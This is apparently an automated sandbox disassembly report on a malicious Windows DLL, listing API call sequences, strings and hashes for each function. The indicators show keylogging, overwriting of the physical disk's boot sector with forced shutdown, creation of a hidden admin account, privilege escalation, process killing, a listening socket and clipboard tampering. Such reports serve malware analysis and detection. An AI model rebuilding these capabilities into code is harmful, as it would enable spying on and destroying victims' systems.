                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Findwsprintf$AttributesCloseDeleteDirectoryFirstNextRemovelstrlen
                                                  • String ID: %$%$%$%$%$.$.
                                                  • API String ID: 1639472542-2249276185
                                                  • Opcode ID: 483abd1fc68d701807be19a5b0fc12024f82d1ce920088ab265a87c25778453c
                                                  • Instruction ID: e9f610893c7e17eea17758c5bff720cce9e31774817f5124bb61c29f53aa675d
                                                  • Opcode Fuzzy Hash: 483abd1fc68d701807be19a5b0fc12024f82d1ce920088ab265a87c25778453c
                                                  • Instruction Fuzzy Hash: 00417F7100D3C19AE711CB64DC48AEBBBE8ABD6344F084A5DF5C893281D6759608C76B
                                                  APIs
                                                  • FindWindowA.USER32(?,00000000), ref: 1001A481
                                                  • GetWindowTextA.USER32(00000000,755732F0,00000104), ref: 1001A4DC
                                                  • GetWindow.USER32(00000000,00000002), ref: 1001A586
                                                  • GetClassNameA.USER32(00000000,755732F0,00000104), ref: 1001A595
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001A5A4
                                                  • wsprintfA.USER32 ref: 1001A619
                                                  • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\Destop.ini,?,00000001), ref: 1001A6C7
                                                  • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\De.ini,?,00000001), ref: 1001A73B
                                                  • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\id.ini,?,00000001), ref: 1001A774
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFileWindow$ClassCloseFindHandleNameTextwsprintf
                                                  • String ID: %s $C:\ProgramData\Microsoft Drive\De.ini$C:\ProgramData\Microsoft Drive\Destop.ini$C:\ProgramData\Microsoft Drive\id.ini$CTXOPConntion_Class$qq.exe
                                                  • API String ID: 2156150844-4244366814
                                                  • Opcode ID: 3d8acf8595d7b5b8568be87e98653658b69e9c91e80da6a7d25cfd14f60d6978
                                                  • Instruction ID: cccadfd23874176e6e13de45dca2d6dba1ce18e4c81b552adfb9ff591e04c6bf
                                                  • Opcode Fuzzy Hash: 3d8acf8595d7b5b8568be87e98653658b69e9c91e80da6a7d25cfd14f60d6978
                                                  • Instruction Fuzzy Hash: 6291F736604A081BC72CC57858556AB76C3EBC5370FA9073DFA6BDB2D1DEB8CD898240
                                                  APIs
                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 10008E7D
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 10008EA9
                                                  • _strcmpi.MSVCRT ref: 10008EBC
                                                  • SHGetFolderPathA.SHELL32(00000000,00000010,00000000,00000000,?), ref: 10008EE7
                                                  • CloseHandle.KERNEL32(00000000), ref: 10008EEE
                                                  • lstrlenA.KERNEL32(?), ref: 10008F02
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 10008F3D
                                                  • SHGetFileInfoA.SHELL32(?,00000080,?,00000160,00000410), ref: 10008F5B
                                                  • lstrlenA.KERNEL32(?), ref: 10008F69
                                                  • lstrlenA.KERNEL32(?), ref: 10008F77
                                                  • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 10008F96
                                                  • GetDriveTypeA.KERNEL32(?), ref: 10008FDD
                                                  • lstrlenA.KERNEL32(?), ref: 10009047
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Drive$CloseDiskFileFolderFreeHandleInfoInformationLogicalNamePathSpaceStringsTypeUserVolume_strcmpi
                                                  • String ID: SYSTEM$g
                                                  • API String ID: 545482129-3120117691
                                                  • Opcode ID: df723ad6942873d95c7a4638fbedeeb3016da053a09685ffa93ad8dbc41845db
                                                  • Instruction ID: c8429926c63601f6ea7d8031317dae8df0805160766070a83ab6d3e18fb45688
                                                  • Opcode Fuzzy Hash: df723ad6942873d95c7a4638fbedeeb3016da053a09685ffa93ad8dbc41845db
                                                  • Instruction Fuzzy Hash: 6B5180715083499FD710DF24C880AEBBBE9FBC8344F444A2DFA8997251D770AA09CB66
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 10025511
                                                  • wcstombs.MSVCRT ref: 10025552
                                                  • NetApiBufferFree.NETAPI32(000000FF,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 1002556E
                                                  • NetApiBufferFree.NETAPI32(000000FF,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 1002558A
                                                  • LocalAlloc.KERNEL32(00000040,00000400,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 100255AB
                                                  • lstrlenA.KERNEL32(1012C7F0), ref: 1002561B
                                                  • lstrlenA.KERNEL32(1012C7F0), ref: 1002563C
                                                  • lstrlenA.KERNEL32(?), ref: 1002564F
                                                  • lstrlenA.KERNEL32(?), ref: 10025671
                                                  • lstrlenA.KERNEL32(?), ref: 10025684
                                                  • lstrlenA.KERNEL32(?), ref: 100256A2
                                                  • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 100256D6
                                                    • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                    • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                    • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                    • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$AllocBufferFreeLocalProcessToken$AdjustCloseCurrentEnumErrorHandleLastLookupOpenPrivilegePrivilegesUserValuewcstombs
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2919970077-2896544425
                                                  • Opcode ID: 5109f0ce4481da27a2eccf9b04b91de86559a6b42d16cfb1df9be0e2de1b6923
                                                  • Instruction ID: 11b2664fd623328df788bc7664e7f7e03edf8d0c1f99df603ce68f2f2ecca6a9
                                                  • Opcode Fuzzy Hash: 5109f0ce4481da27a2eccf9b04b91de86559a6b42d16cfb1df9be0e2de1b6923
                                                  • Instruction Fuzzy Hash: 7A51D1726047169BC305DF58DC819ABB7E9FBC8700F84091DF986A7241DB35E90ACFA6
                                                  APIs
                                                  • Sleep.KERNEL32(0000000A), ref: 1000B8A6
                                                  • lstrlenA.KERNEL32(?), ref: 1000B8B1
                                                  • GetKeyState.USER32(00000010), ref: 1000B8FB
                                                  • GetAsyncKeyState.USER32(0000000D), ref: 1000B907
                                                  • GetKeyState.USER32(00000014), ref: 1000B914
                                                  • GetKeyState.USER32(00000014), ref: 1000B93C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$AsyncSleeplstrlen
                                                  • String ID: <BackSpace>$<Enter>
                                                  • API String ID: 43598291-3792472884
                                                  • Opcode ID: 600104d3a6fed73dbf7a32e2fc48a2a7b55119f13c72bea2c34559d00484d6f4
                                                  • Instruction ID: 254073e1c1d6b0a9fa3052202c61483a4731d11cdb8d0cac1f822bb488184c88
                                                  • Opcode Fuzzy Hash: 600104d3a6fed73dbf7a32e2fc48a2a7b55119f13c72bea2c34559d00484d6f4
                                                  • Instruction Fuzzy Hash: C3510471508B86ABF710DF64CC847AF73E9EB82384F010E2DEA5192194DB35D949C753
                                                  APIs
                                                  • CreateFileA.KERNEL32 ref: 1000E6D2
                                                  • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E705
                                                  • WriteFile.KERNEL32(00000000,00000000,00000200,00000000,00000000), ref: 1000E719
                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 1000E734
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000E737
                                                  • Sleep.KERNEL32(000007D0), ref: 1000E742
                                                  • GetVersion.KERNEL32 ref: 1000E748
                                                  • ExitWindowsEx.USER32(00000006,00000000), ref: 1000E768
                                                  • ExitProcess.KERNEL32 ref: 1000E770
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$ControlDeviceExitFile$CloseCreateCurrentHandleOpenSleepTokenVersionWindowsWrite
                                                  • String ID: SeShutdownPrivilege$U$\\.\PHYSICALDRIVE0
                                                  • API String ID: 554375110-3993181469
                                                  • Opcode ID: 0afe2ad8e16ea5edbc017d365728db05ca0ba4cd117a679420f1a44199d0639f
                                                  • Instruction ID: f74105865133530c9c42a2179fda12015e9b4dafff81d6fb0ebd67d8a36456bb
                                                  • Opcode Fuzzy Hash: 0afe2ad8e16ea5edbc017d365728db05ca0ba4cd117a679420f1a44199d0639f
                                                  • Instruction Fuzzy Hash: BE210735284751BBF230EB64DC4AFDB3B94BB84B10F240614FB697E1D0DAA465048B6A
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,?,?,00000065), ref: 100090AA
                                                  • wsprintfA.USER32 ref: 100090FA
                                                  • FindFirstFileA.KERNEL32(?,?,?,100FA614,?,00000065), ref: 10009110
                                                  • LocalAlloc.KERNEL32(00000040,00002800,00000000,?,00000065), ref: 10009146
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042,?,00000065), ref: 10009174
                                                  • lstrlenA.KERNEL32(?,?,00000065), ref: 10009203
                                                  • FindNextFileA.KERNEL32(?,?,?,00000065), ref: 10009256
                                                  • LocalFree.KERNEL32(00000000,?,00000065), ref: 10009272
                                                  • FindClose.KERNEL32(?,?,00000065), ref: 1000927D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FindLocal$AllocFilelstrlen$CloseFirstFreeNextwsprintf
                                                  • String ID: .$h
                                                  • API String ID: 4283800025-2131999284
                                                  • Opcode ID: d7f2418d2bac61e650567f6f0334c0fa2d95e01bd6ac85b85340cba20e63c3a4
                                                  • Instruction ID: 8ddc5948962728d263d86cc1183bbf29d9fcaf852ba5ad52f36a13bdb15b276c
                                                  • Opcode Fuzzy Hash: d7f2418d2bac61e650567f6f0334c0fa2d95e01bd6ac85b85340cba20e63c3a4
                                                  • Instruction Fuzzy Hash: 2B51387560C3829BE710CF289C84ADBBBE5EF99384F144A58F8D897381D279990DC762
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000), ref: 10025AC9
                                                  • lstrlenA.KERNEL32(00000000), ref: 10025AD9
                                                  • lstrlenA.KERNEL32(00000000), ref: 10025AE2
                                                    • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 10024614
                                                    • Part of subcall function 100245F0: #823.MFC42(00000002,?,00000000,00000000), ref: 10024621
                                                    • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002463D
                                                  • NetUserAdd.NETAPI32 ref: 10025B38
                                                  • #825.MFC42(?), ref: 10025B46
                                                  • #825.MFC42(?,?), ref: 10025B50
                                                  • wcscpy.MSVCRT ref: 10025B94
                                                  • #825.MFC42(?), ref: 10025B9F
                                                  • #825.MFC42(?,?), ref: 10025BA9
                                                  • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,?,00000001,?,00000000,00000001,?,?), ref: 10025BCC
                                                  • #825.MFC42(00000000,00000000,00000000,00000003,?,00000001,?,00000000,00000001,?,?), ref: 10025BD4
                                                  • LocalFree.KERNEL32(?,00000001,?,00000000,00000001,?,?), ref: 10025C05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #825$lstrlen$ByteCharLocalMultiWide$#823FreeGroupMembersUserwcscpy
                                                  • String ID:
                                                  • API String ID: 3899135135-0
                                                  • Opcode ID: 845040a6a147bf0244a5e108915e50923d3870f156928ecec06d720133b77a1b
                                                  • Instruction ID: dd9d3f93371bab7a31d82c422f9be74c5db956489815e8898b81c9b0b0312487
                                                  • Opcode Fuzzy Hash: 845040a6a147bf0244a5e108915e50923d3870f156928ecec06d720133b77a1b
                                                  • Instruction Fuzzy Hash: 7D41B4B56083046BD710DB74DC81EAFB7ECEFC4704F44092DF58497242EAB9E9498B62
                                                  APIs
                                                    • Part of subcall function 1002C6A0: LoadLibraryA.KERNEL32 ref: 1002C6B7
                                                    • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
                                                    • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
                                                    • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
                                                    • Part of subcall function 1002C6A0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1002C6E8
                                                    • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1002C6F4
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000ED2D
                                                  • Process32First.KERNEL32(00000000,00000128), ref: 1000ED4F
                                                  • _strcmpi.MSVCRT ref: 1000ED70
                                                  • OpenProcess.KERNEL32(00000001,00000000,?,00000002,00000000), ref: 1000ED81
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000ED8A
                                                  • Process32Next.KERNEL32(00000000,?), ref: 1000ED92
                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000), ref: 1000ED9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadProcessProcess32$CloseCreateFirstHandleNextOpenSnapshotTerminateToolhelp32_strcmpi
                                                  • String ID: SeDebugPrivilege$explorer.exe
                                                  • API String ID: 3814622859-2721386251
                                                  • Opcode ID: 9745fbd0434098cbd2d8b7dbb2f7fa8ad6dc817a89ea0a6b86a541c905211a0a
                                                  • Instruction ID: 17e0e04e845da399990fac659a5be735f6de37b5642c8976c51b599fa26cdcf9
                                                  • Opcode Fuzzy Hash: 9745fbd0434098cbd2d8b7dbb2f7fa8ad6dc817a89ea0a6b86a541c905211a0a
                                                  • Instruction Fuzzy Hash: 9611D6B66003497BF310EBB0AC46FE7779CEB84381F440926FF05A2181EA65FD1846B2
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,?), ref: 10023A21
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 10023A35
                                                  • htons.WS2_32 ref: 10023A68
                                                  • bind.WS2_32 ref: 10023A83
                                                  • listen.WS2_32(00000000,00000032), ref: 10023A94
                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 10023ABD
                                                  • malloc.MSVCRT ref: 10023AC3
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00023710,00000000,00000000,?), ref: 10023ADF
                                                  • Sleep.KERNEL32(000003E8), ref: 10023AEE
                                                  • CloseHandle.KERNEL32(00000000), ref: 10023AF7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateHandleSleepStartupThreadacceptbindhtonslistenmallocsocket
                                                  • String ID:
                                                  • API String ID: 1905318980-0
                                                  • Opcode ID: 879d038b35c2093bff520af92babf15458f30eb82719e52af9c8519e23b5e649
                                                  • Instruction ID: 8ffb856319ace2f00a0712707d2e876fbf61956362e18ea67a834408e10a4ea4
                                                  • Opcode Fuzzy Hash: 879d038b35c2093bff520af92babf15458f30eb82719e52af9c8519e23b5e649
                                                  • Instruction Fuzzy Hash: 8821D6346483116BF310DF68EC8ABAB77A8FF84754F404628F698D62E0E7B199048627
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 100026B3
                                                  • GetClipboardData.USER32(00000001), ref: 100026C7
                                                  • GlobalLock.KERNEL32(00000000), ref: 100026D8
                                                  • EmptyClipboard.USER32 ref: 100026F2
                                                  • GlobalAlloc.KERNEL32(00000002), ref: 1000270A
                                                  • GlobalLock.KERNEL32(00000000), ref: 10002717
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 1000273B
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 10002744
                                                  • GlobalUnlock.KERNEL32(?), ref: 1000274F
                                                  • CloseClipboard.USER32 ref: 10002755
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
